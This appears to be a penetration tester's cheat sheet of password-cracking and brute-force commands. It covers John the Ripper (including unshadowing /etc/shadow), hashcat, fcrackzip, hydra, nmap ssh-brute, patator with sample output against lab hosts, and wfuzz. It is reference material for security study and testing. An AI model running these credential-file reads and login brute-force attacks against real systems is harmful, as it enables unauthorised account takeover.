John

sudo unshadow /etc/passwd /etc/shadow > users # combine passwd and shadow into one file for cracking

sudo
john --format=zip hash.txt
# same for rar archives (use rar2john to extract the hash)

john <file>
--wordlist=<file.txt>
john --show <file>

--format=
# raw-md5
# raw-sha1

ssh2john <private_key> > hash.txt
zip2john file.zip > hash.txt

rm ./root/.john/john.pot # clear the pot file (cache of already-cracked hashes, normally ~/.john/john.pot) so a re-run cracks again instead of only reporting

hashcat

$ hashcat <options> <hashes_file> <wordlist> 

# attack modes
-a0 # with wordlist
-a3 # brute force
-a3 ?a?a?a?a # four chars long, any char
# charsets: ?l lowercase, ?u uppercase, ?d digits, ?h lowercase hex, ?H uppercase hex, ?s specials, ?a all of the above, ?b all bytes

# hash type
-m3200 # bcrypt
-m1800 # sha512crypt ($6$)
-m0 # md5
-m100 # sha1
-m1000 # NTLM (windows hashdump)
<https://hashcat.net/wiki/doku.php?id=example_hashes>

fcrackzip

$ fcrackzip -b --method 2 -D  -p /usr/share/wordlists/rockyou.txt -v ./file.zip
# -b = brute force
# --method 2 = zip
# -D = dictionary
# -v = verbose (verifying candidates against the archive is -u / --use-unzip)

hydra

hydra

-l <username> # single username
-L <usernames.txt> # file of usernames
-p <password> # single password
-P <passwords.txt> # file of passwords

<ip>

-s <port>

http-post-form "/login:username=^USER^&password=^PASS^:invalid" # last field = string that marks a failed login (or F=<string>); take the path and field names from the browser's network tab (POST request body/headers)
ssh

-V # verbose: shows each username/password attempt

-t 4 # 4 parallel tasks (connections), recommended 1 per core


Nmap

$ nmap <ip> --script ssh-brute --script-args userdb=users.txt,passdb=/usr/share/wordlists/rockyou.txt -vvv

Patator

https://github.com/lanjelot/patator

$ patator 

# ftp user enumeration
ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
[...]
19:36:07 patator    INFO - 230   17     0.001 | ftp                                |    10 | Login successful.
19:36:17 patator    INFO - 530   18     1.000 | michael                            |    50 | Permission denied.

# ssh user enumeration (by response time)
ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3
[...]
17:45:30 patator    FAIL - xxx   41    10.001 | root                               |     1 | <class '__main__.TimeoutError'> timed out
17:45:34 patator    FAIL - xxx   41    10.000 | john                               |    23 | <class '__main__.TimeoutError'> timed out

# http brute force
http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
http_fuzz url="http://10.1.1.92/vulnerabilities/brute/?username=admin&password=FILE0&Login=Login" method=GET header="Cookie:security=low;PHPSESSID=p3tije0mp93ane756j85ar5jbv" 0=/usr/share/wordlists/rockyou.txt -x ignore:fgrep="Username and/or password incorrect."
[...]
11:53:48 patator    INFO - 200  49585:0        0.150 | root:p@ssw0rd                      |    26 | HTTP/1.1 200 OK

Wfuzz

wfuzz
-c # colour
-z file,<wordlist>.txt
-u <url>

-d "username=FUZZ&password=FUZZ"
# or
<url>api.php?username=FUZZ&password=FUZZ

Notes

/usr/share/wordlists

/usr/share/wordlists/dirbuster/apache-user-enum-1.0.txt